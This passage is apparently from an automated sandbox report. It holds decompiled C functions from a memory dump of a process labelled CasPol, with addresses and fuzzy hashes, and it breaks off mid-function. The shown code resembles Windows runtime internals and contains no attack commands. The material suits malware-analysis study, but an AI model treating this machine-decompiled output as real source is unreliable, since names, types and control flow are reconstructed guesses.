                                                                                                                                                                                                                                                                                                				char _v184;
                                                                                                                                                                                                                                                                                                				intOrPtr _v192;
                                                                                                                                                                                                                                                                                                				intOrPtr _v196;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                                                                                				char* _t57;
                                                                                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                				intOrPtr _t67;
                                                                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t64 = __edx;
                                                                                                                                                                                                                                                                                                				_v12 =  *0x181d360 ^ _t69;
                                                                                                                                                                                                                                                                                                				_t65 = 0xa0;
                                                                                                                                                                                                                                                                                                				_v196 = __edx;
                                                                                                                                                                                                                                                                                                				_v177 = 0;
                                                                                                                                                                                                                                                                                                				_t67 = __ecx;
                                                                                                                                                                                                                                                                                                				_v192 = __ecx;
                                                                                                                                                                                                                                                                                                				E0176FA60( &_v176, 0, 0xa0);
                                                                                                                                                                                                                                                                                                				_t57 =  &_v176;
                                                                                                                                                                                                                                                                                                				_t59 = 0xa0;
                                                                                                                                                                                                                                                                                                				if( *0x1817bc8 != 0) {
                                                                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                                                                						asm("movsd");
                                                                                                                                                                                                                                                                                                						asm("movsd");
                                                                                                                                                                                                                                                                                                						asm("movsd");
                                                                                                                                                                                                                                                                                                						asm("movsd");
                                                                                                                                                                                                                                                                                                						_t67 = _v192;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                                                                                                                                                                                                                                                						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                                                                                                                                                                                                                                                						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                                                                                                                                                                                                                                                						_push( &_v184);
                                                                                                                                                                                                                                                                                                						_push(_t59);
                                                                                                                                                                                                                                                                                                						_push(_t57);
                                                                                                                                                                                                                                                                                                						_push(0xa0);
                                                                                                                                                                                                                                                                                                						_push(_t57);
                                                                                                                                                                                                                                                                                                						_push(0xf);
                                                                                                                                                                                                                                                                                                						_t42 = E0176B0B0();
                                                                                                                                                                                                                                                                                                						if(_t42 != 0xc0000023) {
                                                                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						if(_v177 != 0) {
                                                                                                                                                                                                                                                                                                							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_v177 = 1;
                                                                                                                                                                                                                                                                                                						_t44 = L01744620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                                                                                                                                                                                                                                                						_t59 = _v184;
                                                                                                                                                                                                                                                                                                						_t57 = _t44;
                                                                                                                                                                                                                                                                                                						if(_t57 != 0) {
                                                                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t42 = 0xc0000017;
                                                                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if(_t42 != 0) {
                                                                                                                                                                                                                                                                                                						_t65 = L0172CCC0(_t42);
                                                                                                                                                                                                                                                                                                						if(_t65 != 0) {
                                                                                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                                                                                							if(_v177 != 0) {
                                                                                                                                                                                                                                                                                                								if(_t57 != 0) {
                                                                                                                                                                                                                                                                                                									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t46 = _t65;
                                                                                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                                                                                							return L0176B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                                                                                						_t50 = _a4;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                                                                                                                                                                                                                                                						if(_t50 != 3) {
                                                                                                                                                                                                                                                                                                							if(_t50 == 2) {
                                                                                                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                                                                							if(E0176F380(_t67 + 0xc, 0x1705138, 0x10) == 0) {
                                                                                                                                                                                                                                                                                                								 *0x18160d8 = _t67;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							goto L10;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                                                                						_t64 = _t57 + 0x28;
                                                                                                                                                                                                                                                                                                						L01754F49(_t67, _t57 + 0x28);
                                                                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t65 = 0;
                                                                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(L01754E70(0x18186b0, 0x1755690, 0, 0) != 0) {
                                                                                                                                                                                                                                                                                                					_t46 = L0172CCC0(_t56);
                                                                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t59 = 0xa0;
                                                                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                                                                0x01754e09
                                                                                                                                                                                                                                                                                                0x01754e0f
                                                                                                                                                                                                                                                                                                0x01754e57
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e1b
                                                                                                                                                                                                                                                                                                0x01754e30
                                                                                                                                                                                                                                                                                                0x01754e5b
                                                                                                                                                                                                                                                                                                0x01754e5b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e30
                                                                                                                                                                                                                                                                                                0x01754e11
                                                                                                                                                                                                                                                                                                0x01754e11
                                                                                                                                                                                                                                                                                                0x01754e16
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e16
                                                                                                                                                                                                                                                                                                0x01754e01
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e01
                                                                                                                                                                                                                                                                                                0x01754da5
                                                                                                                                                                                                                                                                                                0x01796c6b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754dab
                                                                                                                                                                                                                                                                                                0x01754dab
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754dab

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 58f2ba18561799aa3c5038bf714e7e3f7cc65476b5ceb627acabf88fd0abf1f6
                                                                                                                                                                                                                                                                                                • Instruction ID: 3a4313d7b8a285ec71475e7135b7d66a467dd203fdde10a08131452752c98b91
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58f2ba18561799aa3c5038bf714e7e3f7cc65476b5ceb627acabf88fd0abf1f6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA41C371A403189FEB62DF18DC84F6AF7A9EB55610F000099ED4697285E7B0EE84CB91
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                                			E01738A0A(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				char _v524;
                                                                                                                                                                                                                                                                                                				signed int _v528;
                                                                                                                                                                                                                                                                                                				void* _v532;
                                                                                                                                                                                                                                                                                                				char _v536;
                                                                                                                                                                                                                                                                                                				char _v540;
                                                                                                                                                                                                                                                                                                				char _v544;
                                                                                                                                                                                                                                                                                                				intOrPtr* _v548;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t62;
                                                                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                                                                				unsigned int _t75;
                                                                                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                                                                                				unsigned int _t81;
                                                                                                                                                                                                                                                                                                				unsigned int _t83;
                                                                                                                                                                                                                                                                                                				signed int _t84;
                                                                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t76 = __edx;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t84;
                                                                                                                                                                                                                                                                                                				_v536 = 0x200;
                                                                                                                                                                                                                                                                                                				_t79 = 0;
                                                                                                                                                                                                                                                                                                				_v548 = __edx;
                                                                                                                                                                                                                                                                                                				_v544 = 0;
                                                                                                                                                                                                                                                                                                				_t62 = __ecx;
                                                                                                                                                                                                                                                                                                				_v540 = 0;
                                                                                                                                                                                                                                                                                                				_v532 =  &_v524;
                                                                                                                                                                                                                                                                                                				if(__edx == 0 || __ecx == 0) {
                                                                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                                                                					return L0176B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_v528 = 0;
                                                                                                                                                                                                                                                                                                					E0173E9C0(1, __ecx, 0, 0,  &_v528);
                                                                                                                                                                                                                                                                                                					_t44 = _v528;
                                                                                                                                                                                                                                                                                                					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                					_t46 = 0xa;
                                                                                                                                                                                                                                                                                                					_t87 = _t81 - _t46;
                                                                                                                                                                                                                                                                                                					if(_t87 > 0 || _t87 == 0) {
                                                                                                                                                                                                                                                                                                						 *_v548 = 0x1701180;
                                                                                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                                                                                						_t79 = 1;
                                                                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t48 = L01751DB5(_t62,  &_v532,  &_v536);
                                                                                                                                                                                                                                                                                                						_t76 = _v528;
                                                                                                                                                                                                                                                                                                						if(_t48 == 0) {
                                                                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                                                                							L01763C2A(_t81, _t76,  &_v544);
                                                                                                                                                                                                                                                                                                							 *_v548 = _v544;
                                                                                                                                                                                                                                                                                                							goto L5;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t62 = _v532;
                                                                                                                                                                                                                                                                                                						if(_t62 != 0) {
                                                                                                                                                                                                                                                                                                							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                							_t53 =  *_t62;
                                                                                                                                                                                                                                                                                                							_v528 = _t53;
                                                                                                                                                                                                                                                                                                							if(_t53 != 0) {
                                                                                                                                                                                                                                                                                                								_t63 = _t62 + 4;
                                                                                                                                                                                                                                                                                                								_t55 = _v528;
                                                                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                                                                									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                                                                                                                                                                                                                                                										if(E01738999(_t63,  &_v540) == 0) {
                                                                                                                                                                                                                                                                                                											_t55 = _v528;
                                                                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                                                                											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                                                                                                                                                                                                                                                											_t55 = _v528;
                                                                                                                                                                                                                                                                                                											if(_t75 >= _t83) {
                                                                                                                                                                                                                                                                                                												_t83 = _t75;
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									_t63 = _t63 + 0x14;
                                                                                                                                                                                                                                                                                                									_t55 = _t55 - 1;
                                                                                                                                                                                                                                                                                                									_v528 = _t55;
                                                                                                                                                                                                                                                                                                								} while (_t55 != 0);
                                                                                                                                                                                                                                                                                                								_t62 = _v532;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							if(_t62 !=  &_v524) {
                                                                                                                                                                                                                                                                                                								L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t76 = _t83 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                							_t81 = _t83 >> 0x10;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                                			E017A69A6(signed short* __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                                                                                				signed short _v28;
                                                                                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                                                                                				char* _v44;
                                                                                                                                                                                                                                                                                                				signed int _v48;
                                                                                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                                                                                                                				char _v60;
                                                                                                                                                                                                                                                                                                				signed int _v64;
                                                                                                                                                                                                                                                                                                				char _v68;
                                                                                                                                                                                                                                                                                                				char _v72;
                                                                                                                                                                                                                                                                                                				signed short* _v76;
                                                                                                                                                                                                                                                                                                				signed int _v80;
                                                                                                                                                                                                                                                                                                				char _v84;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                                                                                                                				signed short* _t74;
                                                                                                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                                                                                				signed int _t80;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t80;
                                                                                                                                                                                                                                                                                                				_t75 = 0x100;
                                                                                                                                                                                                                                                                                                				_v64 = _v64 & 0x00000000;
                                                                                                                                                                                                                                                                                                				_v76 = __ecx;
                                                                                                                                                                                                                                                                                                				_t79 = 0;
                                                                                                                                                                                                                                                                                                				_t68 = 0;
                                                                                                                                                                                                                                                                                                				_v72 = 1;
                                                                                                                                                                                                                                                                                                				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                                                                                                                                                                                                                                                				_t77 = 0;
                                                                                                                                                                                                                                                                                                				if(L01736C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                                                                                                                                                                                                                                                					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                                                                                                                                                                                                                					if(_t79 != 0 && E017A6BA3() != 0) {
                                                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                                                						_push(0x1f0003);
                                                                                                                                                                                                                                                                                                						_push( &_v64);
                                                                                                                                                                                                                                                                                                						if(E01769980() >= 0) {
                                                                                                                                                                                                                                                                                                							E01742280(_t56, 0x1818778);
                                                                                                                                                                                                                                                                                                							_t77 = 1;
                                                                                                                                                                                                                                                                                                							_t68 = 1;
                                                                                                                                                                                                                                                                                                							if( *0x1818774 == 0) {
                                                                                                                                                                                                                                                                                                								asm("cdq");
                                                                                                                                                                                                                                                                                                								 *(_t79 + 0xf70) = _v64;
                                                                                                                                                                                                                                                                                                								 *(_t79 + 0xf74) = 0x100;
                                                                                                                                                                                                                                                                                                								_t75 = 0;
                                                                                                                                                                                                                                                                                                								_t73 = 4;
                                                                                                                                                                                                                                                                                                								_v60 =  &_v68;
                                                                                                                                                                                                                                                                                                								_v52 = _t73;
                                                                                                                                                                                                                                                                                                								_v36 = _t73;
                                                                                                                                                                                                                                                                                                								_t74 = _v76;
                                                                                                                                                                                                                                                                                                								_v44 =  &_v72;
                                                                                                                                                                                                                                                                                                								 *0x1818774 = 1;
                                                                                                                                                                                                                                                                                                								_v56 = 0;
                                                                                                                                                                                                                                                                                                								_v28 = _t74[2];
                                                                                                                                                                                                                                                                                                								_v48 = 0;
                                                                                                                                                                                                                                                                                                								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                                                                                                                                                                                                                                                								_v40 = 0;
                                                                                                                                                                                                                                                                                                								_v32 = 0;
                                                                                                                                                                                                                                                                                                								_v24 = 0;
                                                                                                                                                                                                                                                                                                								_v16 = 0;
                                                                                                                                                                                                                                                                                                								if(L0172B6F0(0x170c338, 0x170c288, 3,  &_v60) == 0) {
                                                                                                                                                                                                                                                                                                									_v80 = _v80 | 0xffffffff;
                                                                                                                                                                                                                                                                                                									_push( &_v84);
                                                                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                                                                									_push(_v64);
                                                                                                                                                                                                                                                                                                									_v84 = 0xfa0a1f00;
                                                                                                                                                                                                                                                                                                									E01769520();
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(_v64 != 0) {
                                                                                                                                                                                                                                                                                                					_push(_v64);
                                                                                                                                                                                                                                                                                                					E017695D0();
                                                                                                                                                                                                                                                                                                					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                                                                                                                                                                                                                                                					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(_t77 != 0) {
                                                                                                                                                                                                                                                                                                					L0173FFB0(_t68, _t77, 0x1818778);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_pop(_t78);
                                                                                                                                                                                                                                                                                                				return L0176B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dcec08d4b8d6ccb4ded718dccf24884d0c1eeccf93a17a7c4fc88aa3ad9f1528
                                                                                                                                                                                                                                                                                                • Instruction ID: e6f09fa70b699b9fbd3ef285656eda833e0f4c7a294285a45c6be8398acdd7bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcec08d4b8d6ccb4ded718dccf24884d0c1eeccf93a17a7c4fc88aa3ad9f1528
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF417EB1D012099FDB11CFA9D944BEEFBF8EF88714F18862AE914A3244DB709A05CB50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E01763D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                                                                                				signed short** _t33;
                                                                                                                                                                                                                                                                                                				short* _t38;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t41;
	signed short _t43;
	intOrPtr* _t47;
	intOrPtr* _t53;
	signed short _t57;
	intOrPtr _t58;
	signed short _t60;
	signed short* _t61;

	_t47 = __ecx;
	_t61 = __edx;
	_t60 = ( *__ecx & 0x0000ffff) + 2;
	if(_t60 > 0xfffe) {
		L22:
		return 0xc0000106;
	}
	if(__edx != 0) {
		if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
			L5:
			E01737B60(0, _t61, 0x17011c4);
			_v12 =  *_t47;
			_v12 = _v12 + 0xfff8;
			_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
			E01737B60(0xfff8, _t61,  &_v12);
			_t33 = _a8;
			if(_t33 != 0) {
				 *_t33 = _t61;
			}
			 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
			_t53 = _a12;
			if(_t53 != 0) {
				_t57 = _t61[2];
				_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
				while(_t38 >= _t57) {
					if( *_t38 == 0x5c) {
						_t41 = _t38 + 2;
						if(_t41 == 0) {
							break;
						}
						_t58 = 0;
						if( *_t41 == 0) {
							L19:
							 *_t53 = _t58;
							goto L7;
						}
						 *_t53 = _t41;
						goto L7;
					}
					_t38 = _t38 - 2;
				}
				_t58 = 0;
				goto L19;
			} else {
				L7:
				_t39 = _a16;
				if(_t39 != 0) {
					 *_t39 = 0;
					 *((intOrPtr*)(_t39 + 4)) = 0;
					 *((intOrPtr*)(_t39 + 8)) = 0;
					 *((intOrPtr*)(_t39 + 0xc)) = 0;
				}
				return 0;
			}
		}
		_t61 = _a4;
		if(_t61 != 0) {
			L3:
			_t43 = L01744620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
			_t61[2] = _t43;
			if(_t43 == 0) {
				return 0xc0000017;
			}
			_t61[1] = _t60;
			 *_t61 = 0;
			goto L5;
		}
		goto L22;
	}
	_t61 = _a4;
	if(_t61 == 0) {
		return 0xc000000d;
	}
	goto L3;
}
















                                                                                                                                                                                                                                                                                                0x01763e31
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763e31
                                                                                                                                                                                                                                                                                                0x01763e20
                                                                                                                                                                                                                                                                                                0x01763e20
                                                                                                                                                                                                                                                                                                0x01763e35
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763de9
                                                                                                                                                                                                                                                                                                0x01763de9
                                                                                                                                                                                                                                                                                                0x01763de9
                                                                                                                                                                                                                                                                                                0x01763dee
                                                                                                                                                                                                                                                                                                0x01763dfd
                                                                                                                                                                                                                                                                                                0x01763dff
                                                                                                                                                                                                                                                                                                0x01763e02
                                                                                                                                                                                                                                                                                                0x01763e05
                                                                                                                                                                                                                                                                                                0x01763e05
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763df0
                                                                                                                                                                                                                                                                                                0x01763de7
                                                                                                                                                                                                                                                                                                0x0179e78f
                                                                                                                                                                                                                                                                                                0x0179e794
                                                                                                                                                                                                                                                                                                0x01763d79
                                                                                                                                                                                                                                                                                                0x01763d84
                                                                                                                                                                                                                                                                                                0x01763d89
                                                                                                                                                                                                                                                                                                0x01763d8e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179e7a4
                                                                                                                                                                                                                                                                                                0x01763d96
                                                                                                                                                                                                                                                                                                0x01763d9a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763d9a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179e794
                                                                                                                                                                                                                                                                                                0x01763d6e
                                                                                                                                                                                                                                                                                                0x01763d73
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179e7b5
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4e0447cf5da1b02b208a19dab5988b1fe9b8ab0dafeddb6d5cc6bc7b2c2679c9
                                                                                                                                                                                                                                                                                                • Instruction ID: b5d03e058496b382b4e24b145693170afac28a5d0a07b7574fb5033b4da6ef60
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e0447cf5da1b02b208a19dab5988b1fe9b8ab0dafeddb6d5cc6bc7b2c2679c9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B731B031600615DBDB29CF2DD841A6AFBF9FF5970070980AEE949CB351EB30D880C7A1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                			E0174C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				signed int* _v8;
                                                                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				signed char _t33;
                                                                                                                                                                                                                                                                                                				signed char _t43;
                                                                                                                                                                                                                                                                                                				signed char _t48;
                                                                                                                                                                                                                                                                                                				signed char _t62;
                                                                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                                                                                                				unsigned int* _t82;
                                                                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t80 = __ecx;
                                                                                                                                                                                                                                                                                                				_t82 = __edx;
                                                                                                                                                                                                                                                                                                				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                                                                                                                                                                                                                                                				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                                                                                                                                                                                                                                                				if((_t33 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                                                                                                                                                                                                                                                					if(E01747D50() != 0) {
